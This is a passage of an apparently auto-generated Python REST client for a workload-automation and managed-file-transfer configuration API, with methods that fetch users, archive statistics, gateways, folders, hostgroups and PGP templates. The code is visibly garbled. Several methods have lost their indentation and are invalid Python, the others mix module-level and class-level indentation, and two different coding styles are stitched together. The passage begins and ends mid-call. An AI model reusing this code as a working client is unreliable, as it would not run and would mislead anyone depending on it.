            '/config/authorization/organizationgroup/{organizationgroup}/roles', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[str]', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_all_users(self, **kwargs): # noqa: E501
"""Get users # noqa: E501
Get users # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The user name.
:param str full_name: The user full name.
:param str description: The user description.
:return: list[UserHeader]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_users_with_http_info(**kwargs) # noqa: E501
return data
def get_all_users_with_http_info(self, **kwargs):  # noqa: E501
    """Get users  # noqa: E501

    Query users, optionally filtered by name, full name and description.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_all_users_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The user name.
    :param str full_name: The user full name.
    :param str description: The user description.
    :return: list[UserHeader]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    """
    # Every keyword this endpoint understands, including the generic
    # transport options shared by all API methods.
    accepted = ['name', 'full_name', 'description',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_all_users" % key
            )

    # Map python_style keyword names onto their wire-format query names.
    query_params = [(wire, kwargs[local])
                    for local, wire in (('name', 'name'),
                                        ('full_name', 'fullName'),
                                        ('description', 'description'))
                    if local in kwargs]

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/authorization/users', 'GET',
        {},  # no path parameters
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[UserHeader]',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_archive_statistics(self, **kwargs):  # noqa: E501
    """Get Workload Archiving statistics  # noqa: E501

    Convenience wrapper around :meth:`get_archive_statistics_with_http_info`
    that always requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_archive_statistics(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: RulesStatisticListSummary
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_archive_statistics_with_http_info(**kwargs)  # noqa: E501
def get_archive_statistics_with_http_info(self, **kwargs):  # noqa: E501
    """Get Workload Archiving statistics  # noqa: E501

    Get list of statistical information for each Archiving rule and total
    information about the number of jobs that have been archived, data size
    of all job logs and outputs that have been archived, size of the
    Workload Archiving database including all tables and indexes and
    percentage of disk space used on the Workload Archiving server.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_archive_statistics_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: RulesStatisticListSummary
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    """
    # This endpoint takes no parameters of its own, only the generic
    # transport options shared by all API methods.
    accepted = ['async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_archive_statistics" % key
            )

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/archive/statistics', 'GET',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='RulesStatisticListSummary',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_external_user_authorized_folders(self, name, **kwargs):  # noqa: E501
    """Get MFT external user authorized folders  # noqa: E501

    Convenience wrapper around
    :meth:`get_external_user_authorized_folders_with_http_info` that always
    requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_external_user_authorized_folders(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The external user name. (required)
    :return: list[str]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_external_user_authorized_folders_with_http_info(name, **kwargs)  # noqa: E501
def get_external_user_authorized_folders_with_http_info(self, name, **kwargs):  # noqa: E501
    """Get MFT external user authorized folders  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_external_user_authorized_folders_with_http_info(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The external user name. (required)
    :return: list[str]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``name`` is None.
    """
    accepted = ['name', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_external_user_authorized_folders" % key
            )
    # `name` is interpolated into the request path, so it must be present.
    if name is None:
        raise ValueError("Missing the required parameter `name` when calling `get_external_user_authorized_folders`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/externaluser/{name}/virtualfolders', 'GET',
        {'name': name},
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[str]',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_external_users(self, **kwargs):  # noqa: E501
    """Get MFT external users that match the search criteria.  # noqa: E501

    Convenience wrapper around :meth:`get_external_users_with_http_info`
    that always requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_external_users(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The user name.
    :param str email: The user email.
    :param str description: The user description.
    :param str company: The user company.
    :param str phone_number: The user phoneNumber.
    :return: list[ExternalUserData]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_external_users_with_http_info(**kwargs)  # noqa: E501
def get_external_users_with_http_info(self, **kwargs):  # noqa: E501
    """Get MFT external users that match the search criteria.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_external_users_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The user name.
    :param str email: The user email.
    :param str description: The user description.
    :param str company: The user company.
    :param str phone_number: The user phoneNumber.
    :return: list[ExternalUserData]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    """
    accepted = ['name', 'email', 'description', 'company', 'phone_number',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_external_users" % key
            )

    # Map python_style keyword names onto their wire-format query names.
    query_params = [(wire, kwargs[local])
                    for local, wire in (('name', 'name'),
                                        ('email', 'email'),
                                        ('description', 'description'),
                                        ('company', 'company'),
                                        ('phone_number', 'phoneNumber'))
                    if local in kwargs]

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/externalusers', 'GET',
        {},  # no path parameters
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[ExternalUserData]',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_fts_settings(self, server, agent, **kwargs):  # noqa: E501
    """Get File Transfer Server (FTS) configuration data.  # noqa: E501

    Convenience wrapper around :meth:`get_fts_settings_with_http_info` that
    always requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_fts_settings(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :return: FtsSettingsData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_fts_settings_with_http_info(server, agent, **kwargs)  # noqa: E501
def get_fts_settings_with_http_info(self, server, agent, **kwargs):  # noqa: E501
    """Get File Transfer Server (FTS) configuration data.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_fts_settings_with_http_info(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :return: FtsSettingsData
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``server`` or ``agent`` is None.
    """
    accepted = ['server', 'agent', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_fts_settings" % key
            )
    # Both values are interpolated into the request path, so they must
    # be present.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `get_fts_settings`")  # noqa: E501
    if agent is None:
        raise ValueError("Missing the required parameter `agent` when calling `get_fts_settings`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/fts/settings', 'GET',
        {'server': server, 'agent': agent},
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='FtsSettingsData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_hostgroups(self, server, **kwargs):  # noqa: E501
    """get Server hostgroups  # noqa: E501

    Get all the hostgroups of the specified Server, via a convenience
    wrapper around :meth:`get_hostgroups_with_http_info` that always
    requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_hostgroups(server, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the hostgroups belong to. (required)
    :return: StringListResult
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_hostgroups_with_http_info(server, **kwargs)  # noqa: E501
def get_hostgroups_with_http_info(self, server, **kwargs):  # noqa: E501
    """get Server hostgroups  # noqa: E501

    Get all the hostgroups of the specified Server.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_hostgroups_with_http_info(server, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the hostgroups belong to. (required)
    :return: StringListResult
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``server`` is None.
    """
    accepted = ['server', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_hostgroups" % key
            )
    # `server` is interpolated into the request path, so it must be present.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `get_hostgroups`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/server/{server}/hostgroups', 'GET',
        {'server': server},
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='StringListResult',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_hosts_in_group(self, server, hostgroup, **kwargs):  # noqa: E501
    """get hostgroup agents  # noqa: E501

    Get the agents that compose the specified hostgroup, via a convenience
    wrapper around :meth:`get_hosts_in_group_with_http_info` that always
    requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_hosts_in_group(server, hostgroup, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the hostgroup belongs to. (required)
    :param str hostgroup: The hostgroup name (required)
    :return: AgentsInGroupListResult
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_hosts_in_group_with_http_info(server, hostgroup, **kwargs)  # noqa: E501
def get_hosts_in_group_with_http_info(self, server, hostgroup, **kwargs):  # noqa: E501
    """get hostgroup agents  # noqa: E501

    Get the agents that compose the specified hostgroup.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_hosts_in_group_with_http_info(server, hostgroup, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the hostgroup belongs to. (required)
    :param str hostgroup: The hostgroup name (required)
    :return: AgentsInGroupListResult
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``server`` or ``hostgroup`` is None.
    """
    accepted = ['server', 'hostgroup', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_hosts_in_group" % key
            )
    # Both values are interpolated into the request path, so they must
    # be present.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `get_hosts_in_group`")  # noqa: E501
    if hostgroup is None:
        raise ValueError("Missing the required parameter `hostgroup` when calling `get_hosts_in_group`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/server/{server}/hostgroup/{hostgroup}/agents', 'GET',
        {'server': server, 'hostgroup': hostgroup},
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='AgentsInGroupListResult',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_hub_status_details(self, node_id, **kwargs):  # noqa: E501
    """Get hub status.  # noqa: E501

    Convenience wrapper around :meth:`get_hub_status_details_with_http_info`
    that always requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_hub_status_details(node_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str node_id: Node ID of the hub (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_hub_status_details_with_http_info(node_id, **kwargs)  # noqa: E501
def get_hub_status_details_with_http_info(self, node_id, **kwargs):  # noqa: E501
    """Get hub status.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_hub_status_details_with_http_info(node_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str node_id: Node ID of the hub (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``node_id`` is None.
    """
    accepted = ['node_id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_hub_status_details" % key
            )
    # `node_id` is interpolated into the request path, so it must be present.
    if node_id is None:
        raise ValueError("Missing the required parameter `node_id` when calling `get_hub_status_details`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/hub/{nodeId}/status', 'GET',
        # The wire name of the path parameter is camelCase `nodeId`.
        {'nodeId': node_id},
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_mft_configuration(self, server, agent, **kwargs):  # noqa: E501
    """Get MFT Configuration  # noqa: E501

    Convenience wrapper around :meth:`get_mft_configuration_with_http_info`
    that always requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_mft_configuration(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :return: MftConfigurationData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_mft_configuration_with_http_info(server, agent, **kwargs)  # noqa: E501
def get_mft_configuration_with_http_info(self, server, agent, **kwargs):  # noqa: E501
    """Get MFT Configuration  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_mft_configuration_with_http_info(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :return: MftConfigurationData
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when ``server`` or ``agent`` is None.
    """
    accepted = ['server', 'agent', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_mft_configuration" % key
            )
    # Both values are interpolated into the request path, so they must
    # be present.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `get_mft_configuration`")  # noqa: E501
    if agent is None:
        raise ValueError("Missing the required parameter `agent` when calling `get_mft_configuration`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/configuration', 'GET',
        {'server': server, 'agent': agent},
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='MftConfigurationData',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_mft_folders(self, **kwargs):  # noqa: E501
    """Get MFT virtual folders that match the search criteria.  # noqa: E501

    Convenience wrapper around :meth:`get_mft_folders_with_http_info`
    that always requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_mft_folders(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The virtual folder name.
    :return: list[FolderPropertiesData]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_mft_folders_with_http_info(**kwargs)  # noqa: E501
def get_mft_folders_with_http_info(self, **kwargs):  # noqa: E501
    """Get MFT virtual folders that match the search criteria.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_mft_folders_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The virtual folder name.
    :return: list[FolderPropertiesData]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    """
    accepted = ['name', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_mft_folders" % key
            )

    # The only endpoint-specific filter is the optional folder name.
    query_params = []
    if 'name' in kwargs:
        query_params.append(('name', kwargs['name']))

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/virtualfolders', 'GET',
        {},  # no path parameters
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[FolderPropertiesData]',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_mft_gateways(self, **kwargs):  # noqa: E501
    """Get MFT gateways  # noqa: E501

    Convenience wrapper around :meth:`get_mft_gateways_with_http_info`
    that always requests just the deserialized payload.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_mft_gateways(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: list[GatewayData]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this wrapper never want the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the payload (sync) or the request thread (async).
    return self.get_mft_gateways_with_http_info(**kwargs)  # noqa: E501
def get_mft_gateways_with_http_info(self, **kwargs):  # noqa: E501
    """Get MFT gateways  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_mft_gateways_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: list[GatewayData]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unrecognized keyword argument.
    """
    # This endpoint takes no parameters of its own, only the generic
    # transport options shared by all API methods.
    accepted = ['async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_mft_gateways" % key
            )

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/gateways', 'GET',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='list[GatewayData]',  # noqa: E501
        auth_settings=['Bearer'],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_mft_user_groups(self, **kwargs): # noqa: E501
"""Get all user groups that match the search criteria. # noqa: E501
Get all user groups that match the search criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_user_groups(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The user group name.
:param str external_users: external users.
:param str ldap_groups: ldap groups.
:return: list[UserGroupPropertiesData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_mft_user_groups_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_mft_user_groups_with_http_info(**kwargs) # noqa: E501
return data
    def get_mft_user_groups_with_http_info(self, **kwargs):  # noqa: E501
        """Get all user groups that match the search criteria.  # noqa: E501

        Issues ``GET /config/mft/usergroups`` with the optional search
        filters passed as query parameters.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_mft_user_groups_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: The user group name.
        :param str external_users: external users.
        :param str ldap_groups: ldap groups.
        :return: list[UserGroupPropertiesData]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'external_users', 'ldap_groups']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments; validated kwargs are then
        # merged in and the raw 'kwargs' entry discarded.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_mft_user_groups" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        # Optional filters map snake_case kwargs onto camelCase query keys.
        if 'name' in params:
            query_params.append(('name', params['name']))  # noqa: E501
        if 'external_users' in params:
            query_params.append(('externalUsers', params['external_users']))  # noqa: E501
        if 'ldap_groups' in params:
            query_params.append(('ldapGroups', params['ldap_groups']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
            '/config/mft/usergroups', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[UserGroupPropertiesData]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_pgp_templates(self, server, agent, **kwargs): # noqa: E501
"""Get PGP Templates # noqa: E501
Get PGP Templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_pgp_templates(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str name: The PGP Template Name
:return: list[PgpTemplateData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_pgp_templates_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_pgp_templates_with_http_info(server, agent, **kwargs) # noqa: E501
return data
    def get_pgp_templates_with_http_info(self, server, agent, **kwargs):  # noqa: E501
        """Get PGP Templates  # noqa: E501

        Issues ``GET /config/server/{server}/agent/{agent}/mft/pgptemplates``
        with an optional template-name query filter.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_pgp_templates_with_http_info(server, agent, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :param str name: The PGP Template Name
        :return: list[PgpTemplateData]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server', 'agent', 'name']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots the named arguments (including server/agent);
        # validated kwargs are then merged in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_pgp_templates" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if ('server' not in params or
                params['server'] is None):
            raise ValueError("Missing the required parameter `server` when calling `get_pgp_templates`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if ('agent' not in params or
                params['agent'] is None):
            raise ValueError("Missing the required parameter `agent` when calling `get_pgp_templates`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501
        query_params = []
        if 'name' in params:
            query_params.append(('name', params['name']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['Bearer']  # noqa: E501
        return self.api_client.call_api(
